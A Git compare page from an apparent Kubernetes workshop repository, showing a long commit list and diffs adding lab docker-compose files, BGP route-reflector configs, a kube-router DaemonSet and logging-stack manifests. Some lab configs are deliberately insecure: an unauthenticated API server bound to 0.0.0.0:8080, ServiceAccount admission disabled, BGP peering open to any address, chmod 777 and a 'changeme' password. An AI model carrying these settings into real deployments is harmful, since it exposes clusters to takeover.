Compare commits
294 Commits
qconuk2019
...
exercises
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
6df7529885 | ||
|
|
9a184c6d44 | ||
|
|
ba4ec23767 | ||
|
|
c690a02d37 | ||
|
|
6bbf8a123c | ||
|
|
cede1a4c12 | ||
|
|
e24a1755ec | ||
|
|
44e84c5f23 | ||
|
|
947ab97b14 | ||
|
|
45ea521acd | ||
|
|
99d2e99cea | ||
|
|
0d4b7d6c7e | ||
|
|
45ac1768a3 | ||
|
|
f0d991cd02 | ||
|
|
4e1950821d | ||
|
|
2668a73fb0 | ||
|
|
2d56d9f57c | ||
|
|
b27f960483 | ||
|
|
50211dcc6e | ||
|
|
35654762b3 | ||
|
|
a77fe701b7 | ||
|
|
dee48d950e | ||
|
|
645d424a54 | ||
|
|
875c552029 | ||
|
|
c2eb0de99a | ||
|
|
9efe1f3129 | ||
|
|
14b7670c7d | ||
|
|
f20e0b1435 | ||
|
|
26317315b5 | ||
|
|
5bf39669e3 | ||
|
|
c06b680fed | ||
|
|
ba34183774 | ||
|
|
abda9431ae | ||
|
|
581635044b | ||
|
|
b041a2f9ec | ||
|
|
7fd8b7db2d | ||
|
|
dcd91c46b7 | ||
|
|
076a68379d | ||
|
|
741faed32e | ||
|
|
9a9f7a3c72 | ||
|
|
a458c41068 | ||
|
|
ce6cdae80c | ||
|
|
73f0d61759 | ||
|
|
0ae7d38b68 | ||
|
|
093e3ab5ab | ||
|
|
be72fbe80a | ||
|
|
560328327c | ||
|
|
9f1d2581fc | ||
|
|
ab1a360cdc | ||
|
|
860907ccf0 | ||
|
|
ad4c86b3f4 | ||
|
|
8f7ca0d261 | ||
|
|
626e4a8e35 | ||
|
|
b21f61ad27 | ||
|
|
bac0d9febd | ||
|
|
313df8f9ff | ||
|
|
ef6a5f05f8 | ||
|
|
d71a636a9d | ||
|
|
990a873e81 | ||
|
|
98836d85cf | ||
|
|
c959a4c4a1 | ||
|
|
c3a796faef | ||
|
|
56cc65daf2 | ||
|
|
a541e53c78 | ||
|
|
7a63dfb0cf | ||
|
|
093cfd1c24 | ||
|
|
8492524798 | ||
|
|
12b625d4f6 | ||
|
|
a78e99d97e | ||
|
|
161b8aed7d | ||
|
|
4f1252d0b6 | ||
|
|
1b407cbc5e | ||
|
|
dd6f3c9eee | ||
|
|
d4afae54b8 | ||
|
|
730ef0f421 | ||
|
|
c1f9082fdc | ||
|
|
1fcb223a1d | ||
|
|
5e520dfbe5 | ||
|
|
91d3f025b0 | ||
|
|
79b8e5f2f0 | ||
|
|
f809faadb9 | ||
|
|
4e225fdaf5 | ||
|
|
36be4eaa9f | ||
|
|
57aa25fda0 | ||
|
|
42ed6fc56a | ||
|
|
5aedee5564 | ||
|
|
0a2879e1a5 | ||
|
|
3e87e69608 | ||
|
|
b572d06f82 | ||
|
|
2c0b4b15ba | ||
|
|
f91e995e90 | ||
|
|
59c2ff1911 | ||
|
|
879e7f2ec9 | ||
|
|
ad4cc074c1 | ||
|
|
ab8b478648 | ||
|
|
68f35bd2ed | ||
|
|
964b92d320 | ||
|
|
db961b486f | ||
|
|
a90dcf1d9a | ||
|
|
f4ef2bd6d4 | ||
|
|
baf428ebdb | ||
|
|
3a87183a66 | ||
|
|
3f70ee2c2a | ||
|
|
68a26ae501 | ||
|
|
2ef72a4dd8 | ||
|
|
f4e16dccc4 | ||
|
|
4c55336079 | ||
|
|
b22d3e3d21 | ||
|
|
7b8370dc12 | ||
|
|
db6d2c8188 | ||
|
|
eb02875bd0 | ||
|
|
4ba954cae4 | ||
|
|
84b691a89d | ||
|
|
c1e9073781 | ||
|
|
6593f4ad42 | ||
|
|
bde7f75881 | ||
|
|
25c820c87a | ||
|
|
39027675d5 | ||
|
|
f8e0de3519 | ||
|
|
3a512779b2 | ||
|
|
d987f21cba | ||
|
|
1f08425437 | ||
|
|
f69c9853bb | ||
|
|
c565dad43c | ||
|
|
e48c23e4f4 | ||
|
|
eb04aacb5e | ||
|
|
b0f01e018c | ||
|
|
9504f81526 | ||
|
|
12ef2eb66e | ||
|
|
e4311a3037 | ||
|
|
7309304ced | ||
|
|
26c876174a | ||
|
|
9775954b42 | ||
|
|
d4500eff5a | ||
|
|
0ba6adb027 | ||
|
|
d3af9ff333 | ||
|
|
c9dc6fa7cb | ||
|
|
485704a169 | ||
|
|
72fa8c366b | ||
|
|
8ea4b23530 | ||
|
|
785a8178ca | ||
|
|
0dfff26410 | ||
|
|
5b4debfd81 | ||
|
|
69f9cee6c9 | ||
|
|
4c44f3e690 | ||
|
|
b69119eed4 | ||
|
|
940694a2b0 | ||
|
|
c3de1049f1 | ||
|
|
116515d19b | ||
|
|
098671ec20 | ||
|
|
51e77cb62c | ||
|
|
e2044fc2b2 | ||
|
|
f795d67f02 | ||
|
|
6f6dc66818 | ||
|
|
0ae39339b9 | ||
|
|
e6b73a98f4 | ||
|
|
03657ea896 | ||
|
|
4106059d4a | ||
|
|
2c0ed6ea2a | ||
|
|
3557a546e1 | ||
|
|
d3dd5503cf | ||
|
|
82f8f41639 | ||
|
|
dff8c1e43a | ||
|
|
9deeddc83a | ||
|
|
dc7c1e95ca | ||
|
|
a4babd1a77 | ||
|
|
609756b4f3 | ||
|
|
c367ad1156 | ||
|
|
06aba6737a | ||
|
|
b9c08613ed | ||
|
|
da2264d1ca | ||
|
|
66fbd7ee9e | ||
|
|
a78bb4b2bf | ||
|
|
9dbd995c85 | ||
|
|
b535d43b02 | ||
|
|
a77aabcf95 | ||
|
|
b42e4e6f80 | ||
|
|
1af958488e | ||
|
|
2fe4644225 | ||
|
|
3d001b0585 | ||
|
|
e42d9be1ce | ||
|
|
d794c8df42 | ||
|
|
85144c4f55 | ||
|
|
fba198d4d7 | ||
|
|
da8b4fb972 | ||
|
|
74c9286087 | ||
|
|
d4c3686a2a | ||
|
|
9a66481cfd | ||
|
|
f5d523d3c8 | ||
|
|
9296b375f3 | ||
|
|
6d761b4dcc | ||
|
|
fada4e8ae7 | ||
|
|
dbcb4371d4 | ||
|
|
3f40cc25a2 | ||
|
|
aa55a5b870 | ||
|
|
f272df9aae | ||
|
|
b92da2cf9f | ||
|
|
fea69f62d6 | ||
|
|
627c3361a1 | ||
|
|
603baa0966 | ||
|
|
dd5a66704c | ||
|
|
95b05d8a23 | ||
|
|
c761ce9436 | ||
|
|
020cfeb0ad | ||
|
|
4c89d48a0b | ||
|
|
e2528191cd | ||
|
|
50710539af | ||
|
|
0e7c05757f | ||
|
|
6b21fa382a | ||
|
|
1ff3b52878 | ||
|
|
307fd18f2c | ||
|
|
ad81ae0109 | ||
|
|
11c8ded632 | ||
|
|
5413126534 | ||
|
|
ddcb02b759 | ||
|
|
ff111a2610 | ||
|
|
5a4adb700a | ||
|
|
7c9f144f89 | ||
|
|
cde7c566f0 | ||
|
|
8b2a8fbab6 | ||
|
|
1e77f57434 | ||
|
|
2dc634e1f5 | ||
|
|
df185c88a5 | ||
|
|
f40b8a1bfa | ||
|
|
ded5fbdcd4 | ||
|
|
038563b5ea | ||
|
|
d929f5f84c | ||
|
|
cd1dafd9e5 | ||
|
|
945586d975 | ||
|
|
aa6b74efcb | ||
|
|
4784a41a37 | ||
|
|
0d551f682e | ||
|
|
9cc422f782 | ||
|
|
287f6e1cdf | ||
|
|
2d3ddc570e | ||
|
|
82c26c2f19 | ||
|
|
6636f92cf5 | ||
|
|
ff4219ab5d | ||
|
|
71cfade398 | ||
|
|
c44449399a | ||
|
|
637c46e372 | ||
|
|
ad9f845184 | ||
|
|
3368e21831 | ||
|
|
46ce3d0b3d | ||
|
|
41eb916811 | ||
|
|
1c76e23525 | ||
|
|
2b2d7c5544 | ||
|
|
84c233a954 | ||
|
|
0019b22f1d | ||
|
|
6fe1727061 | ||
|
|
a4b23e3f02 | ||
|
|
d5fd297c2d | ||
|
|
3ad1e89620 | ||
|
|
d1609f0725 | ||
|
|
ef70ed8006 | ||
|
|
5f75f04c97 | ||
|
|
38097a17df | ||
|
|
afa7b47c7a | ||
|
|
4d475334b5 | ||
|
|
59f2416c56 | ||
|
|
9c5fa6f15e | ||
|
|
c1e6fe1d11 | ||
|
|
99adc846ba | ||
|
|
1ee4c31135 | ||
|
|
6f655bff03 | ||
|
|
7fbabd5cc2 | ||
|
|
c1d4df38e5 | ||
|
|
8e6a18d5f7 | ||
|
|
d902f2e6e6 | ||
|
|
8ba825db54 | ||
|
|
1309409528 | ||
|
|
b3a9a017d9 | ||
|
|
3c6cbff913 | ||
|
|
48a5fb5c7a | ||
|
|
ed11f089e1 | ||
|
|
461020300d | ||
|
|
f4e4d13f68 | ||
|
|
5b2a5c1f05 | ||
|
|
fdf5a1311a | ||
|
|
95e2128e7c | ||
|
|
4a8cc82326 | ||
|
|
a4e50f6c6f | ||
|
|
a85266c44c | ||
|
|
5977b11f33 | ||
|
|
3351cf2d13 | ||
|
|
facb5997b7 | ||
|
|
b4d2a5769a | ||
|
|
2cff684e79 | ||
|
|
ea3e19c5c5 | ||
|
|
d9c8f2bc57 | ||
|
|
304faff96b | ||
|
|
852135df9a | ||
|
|
ae6a5a5800 | ||
|
|
0160d9f287 |
1
.gitignore
vendored
@@ -7,7 +7,6 @@ slides/*.yml.html
|
||||
slides/autopilot/state.yaml
|
||||
slides/index.html
|
||||
slides/past.html
|
||||
slides/slides.zip
|
||||
node_modules
|
||||
|
||||
### macOS ###
|
||||
|
||||
@@ -39,7 +39,7 @@ your own tutorials.
|
||||
All these materials have been gathered in a single repository
|
||||
because they have a few things in common:
|
||||
|
||||
- some [common slides](slides/common/) that are re-used
|
||||
- some [shared slides](slides/shared/) that are re-used
|
||||
(and updated) identically between different decks;
|
||||
- a [build system](slides/) generating HTML slides from
|
||||
Markdown source files;
|
||||
|
||||
9
compose/frr-route-reflector/conf/bgpd.conf
Normal file
@@ -0,0 +1,9 @@
|
||||
hostname frr
|
||||
router bgp 64512
|
||||
network 1.0.0.2/32
|
||||
bgp log-neighbor-changes
|
||||
neighbor kube peer-group
|
||||
neighbor kube remote-as 64512
|
||||
neighbor kube route-reflector-client
|
||||
bgp listen range 0.0.0.0/0 peer-group kube
|
||||
log stdout
|
||||
0
compose/frr-route-reflector/conf/vtysh.conf
Normal file
2
compose/frr-route-reflector/conf/zebra.conf
Normal file
@@ -0,0 +1,2 @@
|
||||
hostname frr
|
||||
log stdout
|
||||
34
compose/frr-route-reflector/docker-compose.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
bgpd:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
|
||||
restart: always
|
||||
|
||||
zebra:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
|
||||
restart: always
|
||||
|
||||
vtysh:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: vtysh -c "show ip bgp"
|
||||
|
||||
chmod:
|
||||
image: alpine
|
||||
volumes:
|
||||
- ./run:/var/run/frr
|
||||
command: chmod 777 /var/run/frr
|
||||
29
compose/kube-router-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.3.10
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
|
||||
"Edit the CLUSTER placeholder first. Then, remove this line.":
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
128
compose/kube-router-k8s-control-plane/kuberouter.yaml
Normal file
@@ -0,0 +1,128 @@
|
||||
---
|
||||
apiVersion: |+
|
||||
|
||||
|
||||
Make sure you update the line with --master=http://X.X.X.X:8080 below.
|
||||
Then remove this section from this YAML file and try again.
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: kube-router-cfg
|
||||
namespace: kube-system
|
||||
labels:
|
||||
tier: node
|
||||
k8s-app: kube-router
|
||||
data:
|
||||
cni-conf.json: |
|
||||
{
|
||||
"cniVersion":"0.3.0",
|
||||
"name":"mynet",
|
||||
"plugins":[
|
||||
{
|
||||
"name":"kubernetes",
|
||||
"type":"bridge",
|
||||
"bridge":"kube-bridge",
|
||||
"isDefaultGateway":true,
|
||||
"ipam":{
|
||||
"type":"host-local"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
tier: node
|
||||
name: kube-router
|
||||
namespace: kube-system
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
tier: node
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ''
|
||||
spec:
|
||||
serviceAccountName: kube-router
|
||||
containers:
|
||||
- name: kube-router
|
||||
image: docker.io/cloudnativelabs/kube-router
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
- "--run-router=true"
|
||||
- "--run-firewall=true"
|
||||
- "--run-service-proxy=true"
|
||||
- "--master=http://X.X.X.X:8080"
|
||||
env:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
- name: KUBE_ROUTER_CNI_CONF_FILE
|
||||
value: /etc/cni/net.d/10-kuberouter.conflist
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /healthz
|
||||
port: 20244
|
||||
initialDelaySeconds: 10
|
||||
periodSeconds: 3
|
||||
resources:
|
||||
requests:
|
||||
cpu: 250m
|
||||
memory: 250Mi
|
||||
securityContext:
|
||||
privileged: true
|
||||
volumeMounts:
|
||||
- name: lib-modules
|
||||
mountPath: /lib/modules
|
||||
readOnly: true
|
||||
- name: cni-conf-dir
|
||||
mountPath: /etc/cni/net.d
|
||||
initContainers:
|
||||
- name: install-cni
|
||||
image: busybox
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- set -e -x;
|
||||
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
|
||||
if [ -f /etc/cni/net.d/*.conf ]; then
|
||||
rm -f /etc/cni/net.d/*.conf;
|
||||
fi;
|
||||
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
|
||||
cp /etc/kube-router/cni-conf.json ${TMP};
|
||||
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
|
||||
fi
|
||||
volumeMounts:
|
||||
- mountPath: /etc/cni/net.d
|
||||
name: cni-conf-dir
|
||||
- mountPath: /etc/kube-router
|
||||
name: kube-router-cfg
|
||||
hostNetwork: true
|
||||
tolerations:
|
||||
- key: CriticalAddonsOnly
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node-role.kubernetes.io/master
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node.kubernetes.io/not-ready
|
||||
operator: Exists
|
||||
volumes:
|
||||
- name: lib-modules
|
||||
hostPath:
|
||||
path: /lib/modules
|
||||
- name: cni-conf-dir
|
||||
hostPath:
|
||||
path: /etc/cni/net.d
|
||||
- name: kube-router-cfg
|
||||
configMap:
|
||||
name: kube-router-cfg
|
||||
|
||||
28
compose/simple-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.3.10
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-controller-manager --master http://localhost:8080
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
@@ -72,7 +72,7 @@ spec:
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.0"
|
||||
image: "consul:1.4.4"
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
|
||||
108
k8s/efk.yaml
@@ -3,7 +3,6 @@ apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: fluentd
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
@@ -19,7 +18,6 @@ rules:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
@@ -33,23 +31,18 @@ subjects:
|
||||
- kind: ServiceAccount
|
||||
name: fluentd
|
||||
namespace: default
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: fluentd
|
||||
labels:
|
||||
k8s-app: fluentd-logging
|
||||
version: v1
|
||||
kubernetes.io/cluster-service: "true"
|
||||
app: fluentd
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: fluentd-logging
|
||||
version: v1
|
||||
kubernetes.io/cluster-service: "true"
|
||||
app: fluentd
|
||||
spec:
|
||||
serviceAccount: fluentd
|
||||
serviceAccountName: fluentd
|
||||
@@ -58,7 +51,7 @@ spec:
|
||||
effect: NoSchedule
|
||||
containers:
|
||||
- name: fluentd
|
||||
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
|
||||
image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
|
||||
env:
|
||||
- name: FLUENT_ELASTICSEARCH_HOST
|
||||
value: "elasticsearch"
|
||||
@@ -66,14 +59,12 @@ spec:
|
||||
value: "9200"
|
||||
- name: FLUENT_ELASTICSEARCH_SCHEME
|
||||
value: "http"
|
||||
# X-Pack Authentication
|
||||
# =====================
|
||||
- name: FLUENT_ELASTICSEARCH_USER
|
||||
value: "elastic"
|
||||
- name: FLUENT_ELASTICSEARCH_PASSWORD
|
||||
value: "changeme"
|
||||
- name: FLUENT_UID
|
||||
value: "0"
|
||||
- name: FLUENTD_SYSTEMD_CONF
|
||||
value: "disable"
|
||||
- name: FLUENTD_PROMETHEUS_CONF
|
||||
value: "disable"
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
@@ -94,134 +85,83 @@ spec:
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "1"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
|
||||
spec:
|
||||
progressDeadlineSeconds: 600
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
run: elasticsearch
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
app: elasticsearch
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
spec:
|
||||
containers:
|
||||
- image: elasticsearch:5.6.8
|
||||
imagePullPolicy: IfNotPresent
|
||||
- image: elasticsearch:5
|
||||
name: elasticsearch
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
resources:
|
||||
limits:
|
||||
memory: 2Gi
|
||||
requests:
|
||||
memory: 1Gi
|
||||
env:
|
||||
- name: ES_JAVA_OPTS
|
||||
value: "-Xms1g -Xmx1g"
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
selfLink: /api/v1/namespaces/default/services/elasticsearch
|
||||
spec:
|
||||
ports:
|
||||
- port: 9200
|
||||
protocol: TCP
|
||||
targetPort: 9200
|
||||
selector:
|
||||
run: elasticsearch
|
||||
sessionAffinity: None
|
||||
app: elasticsearch
|
||||
type: ClusterIP
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "1"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
name: kibana
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
|
||||
spec:
|
||||
progressDeadlineSeconds: 600
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
run: kibana
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
app: kibana
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
spec:
|
||||
containers:
|
||||
- env:
|
||||
- name: ELASTICSEARCH_URL
|
||||
value: http://elasticsearch:9200/
|
||||
image: kibana:5.6.8
|
||||
imagePullPolicy: Always
|
||||
image: kibana:5
|
||||
name: kibana
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
name: kibana
|
||||
selfLink: /api/v1/namespaces/default/services/kibana
|
||||
spec:
|
||||
externalTrafficPolicy: Cluster
|
||||
ports:
|
||||
- port: 5601
|
||||
protocol: TCP
|
||||
targetPort: 5601
|
||||
selector:
|
||||
run: kibana
|
||||
sessionAffinity: None
|
||||
app: kibana
|
||||
type: NodePort
|
||||
|
||||
21
k8s/elasticsearch-cluster.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: enterprises.upmc.com/v1
|
||||
kind: ElasticsearchCluster
|
||||
metadata:
|
||||
name: es
|
||||
spec:
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana-oss:6.1.3
|
||||
image-pull-policy: Always
|
||||
cerebro:
|
||||
image: upmcenterprises/cerebro:0.7.2
|
||||
image-pull-policy: Always
|
||||
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
|
||||
image-pull-policy: Always
|
||||
client-node-replicas: 2
|
||||
master-node-replicas: 3
|
||||
data-node-replicas: 3
|
||||
network-host: 0.0.0.0
|
||||
use-ssl: false
|
||||
data-volume-size: 10Gi
|
||||
java-options: "-Xms512m -Xmx512m"
|
||||
|
||||
94
k8s/elasticsearch-operator.yaml
Normal file
@@ -0,0 +1,94 @@
|
||||
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
rules:
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["deployments", "replicasets", "daemonsets"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "create", "delete", "deletecollection"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["batch"]
|
||||
resources: ["cronjobs", "jobs"]
|
||||
verbs: ["create", "get", "deletecollection", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["list", "get", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets", "deployments"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: ["enterprises.upmc.com"]
|
||||
resources: ["elasticsearchclusters"]
|
||||
verbs: ["*"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: elasticsearch-operator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
spec:
|
||||
replicas: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: elasticsearch-operator
|
||||
spec:
|
||||
containers:
|
||||
- name: operator
|
||||
image: upmcenterprises/elasticsearch-operator:0.2.0
|
||||
imagePullPolicy: Always
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
name: http
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /live
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 10
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /ready
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 5
|
||||
serviceAccount: elasticsearch-operator
|
||||
167
k8s/filebeat.yaml
Normal file
@@ -0,0 +1,167 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.config:
|
||||
inputs:
|
||||
# Mounted `filebeat-inputs` configmap:
|
||||
path: ${path.config}/inputs.d/*.yml
|
||||
# Reload inputs configs as they change:
|
||||
reload.enabled: false
|
||||
modules:
|
||||
path: ${path.config}/modules.d/*.yml
|
||||
# Reload module configs as they change:
|
||||
reload.enabled: false
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# hints.enabled: true
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
